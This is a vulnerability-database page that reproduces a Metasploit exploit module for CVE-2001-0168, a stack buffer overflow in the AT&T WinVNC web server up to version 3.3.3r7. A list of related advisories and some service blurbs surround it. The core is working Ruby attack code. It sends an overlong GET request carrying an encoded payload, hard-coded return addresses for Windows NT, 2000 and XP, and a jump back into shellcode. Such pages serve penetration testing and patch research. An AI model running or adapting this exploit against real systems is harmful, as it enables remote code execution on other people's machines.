Vulners
Lucene search
WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2001-0168 | 6 Dec 200900:00 | – | circl |
 | ATT VNC Windows Server Buffer Overflow | 1 Jan 197600:00 | – | coresecurity |
 | CVE-2001-0168 | 9 Mar 200105:00 | – | cve |
 | CVE-2001-0168 | 9 Mar 200105:00 | – | cvelist |
 | WinVNC Web Server GET Overflow | 3 Jun 200814:56 | – | metasploit |
 | CVE-2001-0168 | 3 May 200104:00 | – | nvd |
 | WinVNC Web Server <= v3.3.3r7 GET Overflow | 26 Nov 200900:00 | – | packetstorm |
 | SUSE CVE-2001-0168 | 15 Feb 202306:22 | – | susecve |
 | AT&T WinVNC server contains buffer overflow in Log.cpp | 28 Jun 200100:00 | – | cert |
##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WinVNC Web Server <= v3.3.3r7 GET Overflow',
'Description' => %q{
This module exploits a buffer overflow in the AT&T WinVNC version
<= v3.3.3r7 web server. When debugging mode with logging is
enabled (non-default), an overly long GET request can overwrite
the stack. This exploit does not work well with VNC payloads!
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'BID', '2306' ],
[ 'OSVDB', '6280' ],
[ 'CVE', '2001-0168' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 979,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Windows NT4 SP3-6', { 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll
[ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll
[ 'Windows XP SP0-1', { 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll
],
'DisclosureDate' => 'Jan 29 2001',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(5800),
],self.class)
end
def exploit
sploit = '/' + payload.encoded + [target['Ret']].pack('V')
sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)
res = send_request_raw({
'uri' => sploit,
'method' => 'GET',
}, 5)
handler
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Dec 2009 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.67361